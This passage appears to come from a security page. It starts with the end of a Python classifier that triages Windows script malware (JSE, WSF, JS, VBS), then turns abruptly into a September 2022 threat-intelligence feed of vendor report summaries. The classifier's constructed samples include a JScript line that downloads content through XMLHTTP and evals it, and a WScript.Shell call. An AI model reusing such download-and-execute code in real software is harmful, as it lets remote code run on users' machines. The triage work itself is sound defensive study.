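    if data.lstrip().startswith(ENCODED_MARKER):
        return "encoded-script"      # .jse/.vbe content, whatever the name says
    if WSF_TAG.search(data):
        return "wsf"
    if JS_HINT.search(data):
        return "js"
    if VBS_HINT.search(data):
        return "vbs"
    return "unknown"


def extract_wsf_scripts(data: bytes):
    """(language, body) for each <script> block in a WSF container, so an
    encoded block nested inside the XML is still surfaced for analysis."""
    return [(lang.decode().lower(), body.strip()) for lang, body in SCRIPT_BLOCK.findall(data)]


SAMPLES = {  # constructed, not real Magniber payloads
    "report.wsf": (b'<?xml version="1.0"?>\n<job id="main">\n'
                   b'<script language="JScript.Encode">#@~^AAAAAA==filler==^#~@</script>\n'
                   b'<script language="JScript">\nvar sh = new ActiveXObject("WScript.Shell");\n</script>\n</job>'),
    "invoice.jse": b"#@~^AAAAAA==filler==^#~@",
    "setup.js": b'var x = new ActiveXObject("MSXML2.XMLHTTP"); eval(x.responseText);',
    "run.vbs": b'On Error Resume Next\r\nSet o = CreateObject("WScript.Shell")',
    "readme.txt": b"Just a text file.",
}


def classify_all(samples):
    return {name: classify_script(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, label in classify_all(SAMPLES).items():
        print(f"{name:12s} -> {label}")
    for lang, body in extract_wsf_scripts(SAMPLES["report.wsf"]):
        print(f"  wsf block [{lang}]: {body[:40]!r}")
```

The heuristics are deliberately ordered: the encoder header is checked first because an encoded file has no readable keywords, and the WSF container before the language hints because a WSF can wrap either language. Feed each block returned by extract_wsf_scripts back through classify_script to catch the encoded-inside-XML case.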
2022-09-20
The_Growth_of_Chromeloader_Malware
LOW
+
Intel Source:
VMware
Intel Name:
The_Growth_of_Chromeloader_Malware
Date of Scan:
2022-09-20
Impact:
LOW
Summary:
Researchers from VMware have analyzed the Chromeloader malware and warned of an ongoing campaign in which malicious browser extensions, node-WebKit-based malware and ransomware are being distributed.
Source: https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html
2022-09-20
Multiple_Malwares_delivered_by_Excel_Document
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Multiple_Malwares_delivered_by_Excel_Document
Date of Scan:
2022-09-20
Impact:
MEDIUM
Summary:
FortiGuard Labs recently captured an Excel document with an embedded malicious file in the wild. After some research on the file, Fortinet researchers learned that it exploits a particular vulnerability, CVE-2017-11882 in the Microsoft Equation Editor, to execute malicious code on Microsoft Windows platforms. Researchers picked the “lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe” file (saved as “C:\Users\{UserName}\AppData\Roaming\word.exe”) as an example to analyze. It is the latest Formbook sample in the malware sample logs.
Source: https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882
2022-09-20
Microsoft_365_Phishing_Attacks_Targeting_US_Government_Agencies
MEDIUM
+
Intel Source:
Cofense
Intel Name:
Microsoft_365_Phishing_Attacks_Targeting_US_Government_Agencies
Date of Scan:
2022-09-20
Impact:
MEDIUM
Summary:
Cofense researchers have identified an ongoing phishing campaign targeting U.S. government contractors. In these phishing emails, scammers ask for bids for lucrative government projects, leading users to cloned versions of legitimate government websites.
Source: https://cofense.com/blog/credential-phishing-targeting-government-contractors-evolves-over-time
2022-09-20
Monster_RaaS_campaign_returned_as_a_new_variant
MEDIUM
+
Intel Source:
BlackBerry
Intel Name:
Monster_RaaS_campaign_returned_as_a_new_variant
Date of Scan:
2022-09-20
Impact:
MEDIUM
Summary:
The BlackBerry Research & Intelligence team examined all samples of the Monster ransomware, which is delivered as a 32-bit binary. A hidden user interface gives threat actors control of multiple features of the ransomware on a victim's machine, including selective encryption, self-deletion, and control over services and processes. Monster is also highly configurable, so threat actors can set their own custom extension and personalized ransom note.
Source: https://blogs.blackberry.com/en/2022/09/some-kind-of-monster-raas-hides-itself-using-traits-from-other-malware
2022-09-20
Fake_Telegram_Site_Delivering_RAT
LOW
+
Intel Source:
Cyble
Intel Name:
Fake_Telegram_Site_Delivering_RAT
Date of Scan:
2022-09-20
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs team identified a fake Telegram website masquerading as a legitimate website that downloads a malicious installer. This installer abuses the Windows Defender application to perform RAT operations.
Source: https://blog.cyble.com/2022/09/17/fake-telegram-site-delivering-rat-aimed-at-chinese-users/
2022-09-20
The_Ragnar_Locker_ransomware_roundup_cover
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
The_Ragnar_Locker_ransomware_roundup_cover
Date of Scan:
2022-09-20
Impact:
MEDIUM
Summary:
FortiGuard Labs gathered data on ransomware variants of interest that have been gaining traction within the OSINT community and their datasets. This Ransomware Roundup report covers the Ragnar Locker ransomware, providing readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against this variant.
Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-ragnar-locker-ransomware
2022-09-19
The_details_of_a_Publicly_Available_Slam_Ransomware_Builder
LOW
+
Intel Source:
SentinelOne
Intel Name:
The_details_of_a_Publicly_Available_Slam_Ransomware_Builder
Date of Scan:
2022-09-19
Impact:
LOW
Summary:
SentinelOne analysts provided a thorough account of the Slam Ransomware Builder and of how free ransomware builders like Slam offer an easy route into cybercrime while still presenting a credible threat to organizations and enterprises. They also provided a detailed list of indicators to help security teams detect and protect against Slam ransomware payloads.
Source: https://www.sentinelone.com/blog/from-the-front-lines-slam-anatomy-of-a-publicly-available-ransomware-builder/
2022-09-19
TeamTNT_threat_actors_targeting_cloud_environments
LOW
+
Intel Source:
Aquasec
Intel Name:
TeamTNT_threat_actors_targeting_cloud_environments
Date of Scan:
2022-09-19
Impact:
LOW
Summary:
Aquasec analysts observed and analyzed three different attacks on their honeypots over the past week. The scripts and malware that were used bear a striking resemblance to those of the threat actor TeamTNT.
Source: https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt
2022-09-19
Preventing_ISO_Malware
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Preventing_ISO_Malware
Date of Scan:
2022-09-19
Impact:
LOW
Summary:
Researchers from SANS have analyzed Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the recent success of this technique, I would not be surprised if others take notice and switch to using it for other things.
Source: https://isc.sans.edu/diary/rss/29062
2022-09-19
Russia-Nexus_UAC-0113_Emulating_Telecommunication_Providers_in_Ukraine
LOW
+
Intel Source:
Recorded Future
Intel Name:
Russia-Nexus_UAC-0113_Emulating_Telecommunication_Providers_in_Ukraine
Date of Scan:
2022-09-19
Impact:
LOW
Summary:
Researchers at Insikt Group, while monitoring UAC-0113 infrastructure, observed the recurring use of dynamic DNS domains masquerading as telecommunication providers operating in Ukraine, which shows that the group's efforts to target entities in Ukraine remain ongoing. Domain masquerades can enable spearphishing campaigns or redirects that pose a threat to victim networks.
Source: https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf
2022-09-19
The_widespread_of_RedLine_stealer
LOW
+
Intel Source:
Securelist
Intel Name:
The_widespread_of_RedLine_stealer
Date of Scan:
2022-09-19
Impact:
LOW
Summary:
Securelist's researchers recently caught suspicious activity that was part of a collection of malicious programs distributed in the form of a single installation file, self-extracting archive, or other file with installer-type functionality.
Source: https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/
2022-09-16
Trojanized_Putty_through_Phishing
LOW
+
Intel Source:
Mandiant
Intel Name:
Trojanized_Putty_through_Phishing
Date of Scan:
2022-09-16
Impact:
LOW
Summary:
Researchers from Mandiant identified a trojanized PuTTY ISO payload being delivered through a fabricated job lure (spear phishing) employed by the threat cluster tracked as UNC4034, suspected to be part of the "Operation Dream Job" campaigns.
Source: https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing
2022-09-16
Scammers_Abuse_Microsoft_Edge's_News_Feed_Ads
LOW
+
Intel Source:
MalwareBytes
Intel Name:
Scammers_Abuse_Microsoft_Edge's_News_Feed_Ads
Date of Scan:
2022-09-16
Impact:
LOW
Summary:
Researchers from Malwarebytes have identified an ongoing malvertising campaign that is injecting ads in the Microsoft Edge News Feed to redirect potential victims to websites pushing tech support scams.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2022/09/microsoft-edges-news-feed-pushes-tech-support-scam
2022-09-16
Revived_Version_of_Raccoon_Stealer
LOW
+
Intel Source:
Cloudsek
Intel Name:
Revived_Version_of_Raccoon_Stealer
Date of Scan:
2022-09-16
Impact:
LOW
Summary:
CloudSEK researchers analyzed a Raccoon malware sample and found it to be an updated version of Raccoon stealer. In underground forums, the developer of Raccoon stealer is very active, regularly updating the malware and posting about new feature builds.
Source: https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon/?utm_source=rss&utm_medium=rss&utm_campaign=recordbreaker-the-resurgence-of-raccoon
2022-09-16
Hackers_Continue_to_Abuse_Google_Sites_and_Microsoft_Azure
LOW
+
Intel Source:
Netskope
Intel Name:
Hackers_Continue_to_Abuse_Google_Sites_and_Microsoft_Azure
Date of Scan:
2022-09-16
Impact:
LOW
Summary:
Netskope researchers discovered a phishing campaign where attackers are abusing Google Sites and Microsoft Azure Web Apps to steal cryptocurrency wallets and accounts from Coinbase, MetaMask, Kraken, and Gemini.
Source: https://www.netskope.com/es/blog/attackers-continue-to-abuse-google-sites-and-microsoft-azure-to-host-cryptocurrency-phishing
2022-09-16
Russia_linked_Gamaredon_APT_Targeting_Ukraine_Using_InfoStealer_Malware
LOW
+
Intel Source:
Cisco Talos
Intel Name:
Russia_linked_Gamaredon_APT_Targeting_Ukraine_Using_InfoStealer_Malware
Date of Scan:
2022-09-16
Impact:
LOW
Summary:
Researchers at Cisco Talos have observed that the Russia-linked Gamaredon group has been targeting Ukrainian government, defense, and law enforcement agencies with a custom-made information-stealer implant.
Source: https://blog.talosintelligence.com/2022/09/gamaredon-apt-targets-ukrainian-agencies.html
2022-09-16
Word_Maldoc_With_CustomXML_and_Renamed_VBAProject
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Word_Maldoc_With_CustomXML_and_Renamed_VBAProject
Date of Scan:
2022-09-16
Impact:
LOW
Summary:
Researchers from SANS have analyzed samples and found that in one of them the VBA project file (an OLE file) is named FIzzyWAbnj.bin instead of the usual VBAProject.bin.
Source: https://isc.sans.edu/diary/rss/29056
2022-09-16
PrivateLoader_the_most_widely_used_loader_in_2022
LOW
+
Intel Source:
Sekoia
Intel Name:
PrivateLoader_the_most_widely_used_loader_in_2022
Date of Scan:
2022-09-16
Impact:
LOW
Summary:
PrivateLoader became one of the most widespread loaders used by a PPI service in 2022. SEKOIA analysts tracked PrivateLoader's network infrastructure for several months and recently conducted an in-depth analysis of the malware. In parallel, they also monitored activities related to the ruzki PPI malware service.
Source: https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/
2022-09-16
BlackTech_Threat_Group_ExploitsF5_BIG-IP_Vulnerability
MEDIUM
+
Intel Source:
JPCERT
Intel Name:
BlackTech_Threat_Group_ExploitsF5_BIG-IP_Vulnerability
Date of Scan:
2022-09-16
Impact:
MEDIUM
Summary:
JPCERT has identified attack activity exploiting the F5 BIG-IP vulnerability (CVE-2022-1388) against Japanese organizations. The targeted organizations have confirmed that data in BIG-IP was compromised.
Source: https://blogs.jpcert.or.jp/en/2022/09/bigip-exploit.html
2022-09-15
One_of_the_most_used_infostealer_Erbium
LOW
+
Intel Source:
Cluster25
Intel Name:
One_of_the_most_used_infostealer_Erbium
Date of Scan:
2022-09-15
Impact:
LOW
Summary:
Cluster25 analysts observed that Erbium could become one of the most-used infostealers among cybercriminals due to its wide range of capabilities and the growing demand for Malware-as-a-Service (M-a-a-S).
Source: https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer
2022-09-15
Iranian_Cyber_Actors_Exploiting_Known_Vulnerabilities
MEDIUM
+
Intel Source:
CISA
Intel Name:
Iranian_Cyber_Actors_Exploiting_Known_Vulnerabilities
Date of Scan:
2022-09-15
Impact:
MEDIUM
Summary:
Researchers from CISA have identified Iranian Islamic Revolutionary Guard Corps (IRGC)-affiliated cyber actors exploiting vulnerabilities for data extortion and disk encryption in ransom operations.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-257a
2022-09-15
Hackers_Are_Using_Name_of_Queen_Elizabeth_II_in_Phishing_Attacks
LOW
+
Intel Source:
ProofPoint
Intel Name:
Hackers_Are_Using_Name_of_Queen_Elizabeth_II_in_Phishing_Attacks
Date of Scan:
2022-09-15
Impact:
LOW
Summary:
Researchers at Proofpoint have identified threat actors exploiting the death of Queen Elizabeth II in phishing attacks to steal their targets' Microsoft accounts.
Source: https://twitter.com/threatinsight/status/1570092339984584705
2022-09-15
Malicious_Word_Document_With_a_Frameset
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Malicious_Word_Document_With_a_Frameset
Date of Scan:
2022-09-15
Impact:
LOW
Summary:
SANS researchers have discovered a malicious Word OOXML document (the new ".docx" format) that is a simple downloader. No malicious code is contained in this document, but merely a reference to a second stage which will be delivered when the document is opened.
Source: https://isc.sans.edu/diary/rss/29052
2022-09-15
Greek_Banking_Users_Targeted_in_Phishing_Campaign
LOW
+
Intel Source:
Cyble
Intel Name:
Greek_Banking_Users_Targeted_in_Phishing_Campaign
Date of Scan:
2022-09-15
Impact:
LOW
Summary:
Researchers from Cyble discovered multiple URLs hosting pages pretending to be Greece's tax refund website. To receive the supposed refund transfer, users are asked to confirm their current account number and the amount of their tax refund.
Source: https://blog.cyble.com/2022/09/14/phishing-campaign-targets-greek-banking-users/
2022-09-15
Webworm_hackers_modify_old_malware_in_new_attacks
LOW
+
Intel Source:
Symantec
Intel Name:
Webworm_hackers_modify_old_malware_in_new_attacks
Date of Scan:
2022-09-15
Impact:
LOW
Summary:
Researchers from Symantec have observed that the Chinese 'Webworm' hacking group is experimenting with customizing old malware in new attacks, likely to evade attribution and reduce operational costs.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats
2022-09-15
Japanese_Taxpayers_Targeted_in_Phishing_Campaign
LOW
+
Intel Source:
Cyble
Intel Name:
Japanese_Taxpayers_Targeted_in_Phishing_Campaign
Date of Scan:
2022-09-15
Impact:
LOW
Summary:
Researchers from Cyble Research & Intelligence Labs discovered a new phishing campaign imitating the National Tax Agency, which targets Japanese users by tricking them into sharing sensitive information.
Source: https://blog.cyble.com/2022/09/13/phishing-campaign-targets-japanese-tax-payers/
2022-09-15
Exploiting_Notepad++_Plugins_for_Evasion_and_Persistence
LOW
+
Intel Source:
Cybereason
Intel Name:
Exploiting_Notepad++_Plugins_for_Evasion_and_Persistence
Date of Scan:
2022-09-15
Impact:
LOW
Summary:
Researchers from Cybereason have analyzed a specific technique that leverages Notepad++ plugins to persist and evade security mechanisms on a machine.
Source: https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence
2022-09-14
A_detailed_Analysis_of_Iranian_COBALT_MIRAGE_Threat_Group
LOW
+
Intel Source:
Secureworks
Intel Name:
A_detailed_Analysis_of_Iranian_COBALT_MIRAGE_Threat_Group
Date of Scan:
2022-09-14
Impact:
LOW
Summary:
Researchers at Secureworks have analyzed ransomware incidents and uncovered details about Iranian COBALT MIRAGE operations. During this incident, COBALT MIRAGE exploited the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-30207).
Source: https://www.secureworks.com/blog/opsec-mistakes-reveal-cobalt-mirage-threat-actors
2022-09-14
A_new_variant_of_Agent_Tesla
LOW
+
Intel Source:
Palo Alto
Intel Name:
A_new_variant_of_Agent_Tesla
Date of Scan:
2022-09-14
Impact:
LOW
Summary:
The Agent Tesla keylogger's developers announced on the Agent Tesla Discord server that users should switch over to a new keylogger, OriginLogger, software as powerful as Agent Tesla. OriginLogger is Agent Tesla (AT)-based and has all of its features; it is a variant of Agent Tesla. As such, the majority of tools and detections for Agent Tesla will still trigger on OriginLogger samples.
Source: https://unit42.paloaltonetworks.com/originlogger/
2022-09-14
New_Linux_SideWalk_backdoor_Variant_used_by_SparklingGoblin_APT_Hackers
LOW
+
Intel Source:
WeliveSecurity
Intel Name:
New_Linux_SideWalk_backdoor_Variant_used_by_SparklingGoblin_APT_Hackers
Date of Scan:
2022-09-14
Impact:
LOW
Summary:
ESET researchers have discovered a Linux variant of the SideWalk backdoor used by SparklingGoblin. SparklingGoblin is an APT group that partially overlaps with APT41 and BARIUM in its tactics, techniques, and procedures.
Source: https://www.welivesecurity.com/2022/09/14/you-never-walk-alone-sidewalk-backdoor-linux-variant/
2022-09-14
Hackers_Exploiting_Oracle_WebLogic_Server_Vulnerabilities
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
Hackers_Exploiting_Oracle_WebLogic_Server_Vulnerabilities
Date of Scan:
2022-09-14
Impact:
MEDIUM
Summary:
Trend Micro researchers have observed malicious actors exploiting both newly disclosed and older Oracle WebLogic Server vulnerabilities to deliver cryptocurrency-mining malware.
Source: https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html
2022-09-14
Easy_Process_Injection_within_Python
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Easy_Process_Injection_within_Python
Date of Scan:
2022-09-14
Impact:
LOW
Summary:
Researchers from SANS have analyzed malicious Python scripts. They can call any Microsoft Windows API and perform process injection using the classic VirtualAlloc, CreateRemoteThread, and similar calls.
Source: https://isc.sans.edu/diary/rss/29048
2022-09-14
A_distribution_of_masking_phishing_websites
LOW
+
Intel Source:
ASEC
Intel Name:
A_distribution_of_masking_phishing_websites
Date of Scan:
2022-09-14
Impact:
LOW
Summary:
While collecting various malware strains, ASEC analysts caught a phishing website targeting Korean users, which has been distributed continuously since August to Korean email accounts only. The phishing website's URL is not only distributed through email but is also exposed among the top search results of the Google search engine.
Source: https://asec.ahnlab.com/en/38786/
2022-09-13
New_Espionage_Activity_Targeting_Asian_Governments
LOW
+
Intel Source:
Symantec
Intel Name:
New_Espionage_Activity_Targeting_Asian_Governments
Date of Scan:
2022-09-13
Impact:
LOW
Summary:
Researchers from Symantec have identified a campaign that targets government and state-owned organizations in several Asian countries, including the offices of multiple prime ministers or heads of government.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
2022-09-13
Mitel_VoIP_Appliance_Vulnerability_Exploited_by_Lorenz_Ransomware_Group
LOW
+
Intel Source:
Arcticwolf
Intel Name:
Mitel_VoIP_Appliance_Vulnerability_Exploited_by_Lorenz_Ransomware_Group
Date of Scan:
2022-09-13
Impact:
LOW
Summary:
The Lorenz ransomware group was seen exploiting a critical-severity vulnerability in the Mitel MiVoice VoIP appliance for initial access into a victim's network, researchers at the cybersecurity firm Arctic Wolf reported.
Source: https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
2022-09-13
Iranian_Hackers_Targeting_Nuclear_Security_and_Genomic_Research
LOW
+
Intel Source:
ProofPoint
Intel Name:
Iranian_Hackers_Targeting_Nuclear_Security_and_Genomic_Research
Date of Scan:
2022-09-13
Impact:
LOW
Summary:
Proofpoint researchers have discovered a cyberespionage campaign conducted by TA453 threat actors linked to Iran. It targeted individuals specializing in nuclear security, Middle Eastern affairs, and genome research. To target their victims, threat actors used at least two actor-controlled personas.
Source: https://www.proofpoint.com/us/blog/threat-insight/ta453-uses-multi-persona-impersonation-capitalize-fomo
2022-09-13
Ransomware_Campaigns_Linked_to_Iranian_Govt's_DEV_0270_Hackers
LOW
+
Intel Source:
Microsoft
Intel Name:
Ransomware_Campaigns_Linked_to_Iranian_Govt's_DEV_0270_Hackers
Date of Scan:
2022-09-13
Impact:
LOW
Summary:
Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of Iranian actor PHOSPHORUS.
Source: https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
2022-09-12
Diving_Deep_into_Emotet_Malware
LOW
+
Intel Source:
DFIR Report
Intel Name:
Diving_Deep_into_Emotet_Malware
Date of Scan:
2022-09-12
Impact:
LOW
Summary:
Researchers from The DFIR Report have published a deep analysis of the Emotet malware.
Source: https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/
2022-09-12
Phishing_Word_Documents_with_Suspicious_URL
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Phishing_Word_Documents_with_Suspicious_URL
Date of Scan:
2022-09-12
Impact:
LOW
Summary:
Researchers from SANS have analyzed a quarantined email that was marked as phishing by Defender, with the subject "Urgent Payment Issue".
Source: https://isc.sans.edu/diary/rss/29034
2022-09-12
A_new_form_of_delivery_of_the_Lampion_banking_trojan
LOW
+
Intel Source:
Cofense
Intel Name:
A_new_form_of_delivery_of_the_Lampion_banking_trojan
Date of Scan:
2022-09-12
Impact:
LOW
Summary:
Cofense PDC analysts have spotted threat actors delivering a new form of the Lampion malware through a VBS loader. By abusing the trusted cloud-sharing platform WeTransfer, the threat actors attempt to gain users' trust while taking advantage of the service provided by the popular site.
Source: https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing
2022-09-09
Collecting_Credentials_Through_Third-Party_Software
LOW
+
Intel Source:
Palo Alto
Intel Name:
Collecting_Credentials_Through_Third-Party_Software
Date of Scan:
2022-09-09
Impact:
LOW
Summary:
Palo Alto researchers explored some common third-party software scenarios related to credential gathering, examining how passwords are stored, retrieved, and monitored based on real-world attack scenarios.
Source: https://unit42.paloaltonetworks.com/credential-gathering-third-party-software/
2022-09-09
Ransomware_Developers_Leveraging_Intermittent_Encryption_to_Avoid_Detection
LOW
+
Intel Source:
SentinelOne
Intel Name:
Ransomware_Developers_Leveraging_Intermittent_Encryption_to_Avoid_Detection
Date of Scan:
2022-09-09
Impact:
LOW
Summary:
SentinelOne researchers have observed that ransomware developers use intermittent encryption to evade detection. As a result of this encryption method, ransomware operators are able to evade detection systems and encrypt victims' files more quickly.
Source: https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/
2022-09-09
A_Deep_Investigation_of_Albanian_Government_Cyberattacks
LOW
+
Intel Source:
Microsoft
Intel Name:
A_Deep_Investigation_of_Albanian_Government_Cyberattacks
Date of Scan:
2022-09-09
Impact:
LOW
Summary:
Microsoft researchers investigated the cyberattacks on the Albanian government that disrupted public services and government websites. Besides the destructive cyberattack, MSTIC reports that an Iranian state-sponsored actor released sensitive information that had already been exfiltrated.
Source: https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/
2022-09-09
Bronze_President_Group_Targeting_Government_Officials
LOW
+
Intel Source:
Secureworks
Intel Name:
Bronze_President_Group_Targeting_Government_Officials
Date of Scan:
2022-09-09
Impact:
LOW
Summary:
Researchers from Secureworks have identified a PlugX malware campaign targeting computers belonging to government officials of several countries in Europe, the Middle East, and South America.
Source: https://www.secureworks.com/blog/bronze-president-targets-government-officials
2022-09-09
Lazarus_Hackers_Targeting_Energy_Providers_Around_the_World
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
Lazarus_Hackers_Targeting_Energy_Providers_Around_the_World
Date of Scan:
2022-09-09
Impact:
MEDIUM
Summary:
A Cisco Talos study discovered that the North Korea-linked Lazarus Group targeted energy providers around the world from February through July 2022, including U.S., Canadian, and Japanese companies.
Source: https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
2022-09-08
Moobot_Botnet_Targeting_Unpatched_D-Link_Routers
LOW
+
Intel Source:
Palo Alto
Intel Name:
Moobot_Botnet_Targeting_Unpatched_D-Link_Routers
Date of Scan:
2022-09-08
Impact:
LOW
Summary:
Researchers from Palo Alto have discovered attacks leveraging several vulnerabilities in D-Link routers; the exploited vulnerabilities include CVE-2015-2051, CVE-2018-6530, CVE-2022-26258, and CVE-2022-28958.
Source: https://unit42.paloaltonetworks.com/moobot-d-link-devices/?web_view=true#post-124794-_73lw4g4a4pw2
2022-09-08
Zero-Day_Vulnerability_Exploited_in_BackupBuddy_Plugin
LOW
+
Intel Source:
Wordfence
Intel Name:
Zero-Day_Vulnerability_Exploited_in_BackupBuddy_Plugin
Date of Scan:
2022-09-08
Impact:
LOW
Summary:
Wordfence's Threat Intelligence team has discovered a zero-day vulnerability being actively exploited in BackupBuddy, a WordPress plugin with approximately 140,000 installations. The vulnerability allows unauthenticated users to download sensitive information from the affected site.
Source: https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/?web_view=true
2022-09-08
A_Deep_Examination_of_PlugX_RAT_Loader
LOW
+
Intel Source:
Cybereason
Intel Name:
A_Deep_Examination_of_PlugX_RAT_Loader
Date of Scan:
2022-09-08
Impact:
LOW
Summary:
Cybereason researchers have investigated PlugX malware, a Remote Access Tool/Trojan (RAT) often used by Asian APT groups like APT27. With its many malicious "plugins," the malware has backdoor capabilities that allow it to take complete control over the environment.
Source: https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution
2022-09-08
In-depth_exploration_of_APT42
LOW
+
Intel Source:
Mandiant
Intel Name:
In-depth_exploration_of_APT42
Date of Scan:
2022-09-08
Impact:
LOW
Summary:
Mandiant researchers have conducted a deep analysis of APT42 and published a report. This report examines APT42's recent and historical activities, its tactics, techniques, and procedures, targeting patterns, and historical connections to APT35.
Source: https://www.mandiant.com/media/17826 https://www.mandiant.com/resources/blog/apt42-charms-cons-compromises
2022-09-08
A_new_remote_access_trojan_MagicRAT
LOW
+
Intel Source:
Cisco Talos
Intel Name:
A_new_remote_access_trojan_MagicRAT
Date of Scan:
2022-09-08
Impact:
LOW
Summary:
Researchers at Cisco Talos have observed a new remote access trojan from the Lazarus APT group being deployed in the wild for arbitrary command execution.
Source: https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html https://github.com/Cisco-Talos/IOCs/tree/main/2022/09
2022-09-08
Conti_Cybercrime_Hackers_Targeting_Ukraine
LOW
+
Intel Source:
Google blog
Intel Name:
Conti_Cybercrime_Hackers_Targeting_Ukraine
Date of Scan:
2022-09-08
Impact:
LOW
Summary:
Researchers from Google's Threat Analysis Group have identified that some former Conti ransomware gang members are now part of a threat group tracked as UAC-0098, which is targeting Ukrainian organizations and European non-governmental organizations.
Source: https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/
2022-09-08
An_Unusual_Case_of_Monti_Ransomware
LOW
+
Intel Source:
BlackBerry
Intel Name:
An_Unusual_Case_of_Monti_Ransomware
Date of Scan:
2022-09-08
Impact:
LOW
Summary:
The BlackBerry Incident Response team has investigated an attack by a previously unknown group, calling itself "MONTI," which encrypted nearly 20 user hosts as well as a multi-host VMware ESXi cluster, bringing down over 20 servers.
Source: https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger
2022-09-08
Vice_Society_Ransomware_Targeting_Education_Sector
LOW
+
Intel Source:
CISA
Intel Name:
Vice_Society_Ransomware_Targeting_Education_Sector
Date of Scan:
2022-09-08
Impact:
LOW
Summary:
The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks, and they provided network defenders with Vice Society IOCs and TTPs observed by the FBI in attacks as of September 2022.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-249a
2022-09-08
Bumblebee_Malware_Back_With_New_Technique
LOW
+
Intel Source:
Cyble
Intel Name:
Bumblebee_Malware_Back_With_New_Technique
Date of Scan:
2022-09-08
Impact:
LOW
Summary:
Researchers from Cyble came across a Twitter post in which a researcher described an interesting infection chain of the Bumblebee loader malware being distributed via spam campaigns.
Source: https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/
2022-09-07
Cyber_Attackers_Leveraging_Red_Teaming_Tools
LOW
+
Intel Source:
Cyble
Intel Name:
Cyber_Attackers_Leveraging_Red_Teaming_Tools
Date of Scan:
2022-09-07
Impact:
LOW
Summary:
Cyble researchers have discovered threat actors actively using PowerShell Empire to spread multiple infections and employing the tool to perform highly stealthy and dangerous attacks against their targets.
Source: https://blog.cyble.com/2022/09/06/adversaries-actively-utilizing-powershell-empire/
2022-09-07
The_Ares_Banking_Trojan_Updated_with_Domain_Generation_Algorithm
LOW
+
Intel Source:
Zscaler
Intel Name:
The_Ares_Banking_Trojan_Updated_with_Domain_Generation_Algorithm
Date of Scan:
2022-09-07
Impact:
LOW
Summary:
In an update to the Ares banking trojan, researchers at Zscaler ThreatLabz observed a domain generation algorithm (DGA) that resembles Qakbot's. Threat actors attempt to maximize the life of an infection, which provides them with the opportunity to monetize compromised systems through wire fraud and ransomware attacks.
Source: https://www.zscaler.com/blogs/security-research/ares-banking-trojan-learns-old-tricks-adds-defunct-qakbot-dga
2022-09-07
Worok_Hackers_Targeting_Asian_Companies_and_Governments
LOW
+
Intel Source:
WeliveSecurity
Intel Name:
Worok_Hackers_Targeting_Asian_Companies_and_Governments
Date of Scan:
2022-09-07
Impact:
LOW
Summary:
WeLiveSecurity researchers have discovered a new cyberespionage group, Worok, which carries out targeted attacks using undocumented tools against various high-profile companies and local governments, mostly in Asia.
Source: https://www.welivesecurity.com/2022/09/06/worok-big-picture/
2022-09-07
Diving_Deep_into_TA505_Group
LOW
+
Intel Source:
PRODAFT
Intel Name:
Diving_Deep_into_TA505_Group
Date of Scan:
2022-09-07
Impact:
LOW
Summary:
Researchers from the PRODAFT Threat Intelligence team have done an in-depth analysis of the TA505 group. They also identified the group's control panel and used it to gain insight into how the organization works.
Source: https://www.prodaft.com/resource/detail/ta505-ta505-groups-tesla-gun-depth-analysis
2022-09-06
A_Detailed_Analysis_of_Mythic_C2_Framework
LOW
+
Intel Source:
TeamCymru
Intel Name:
A_Detailed_Analysis_of_Mythic_C2_Framework
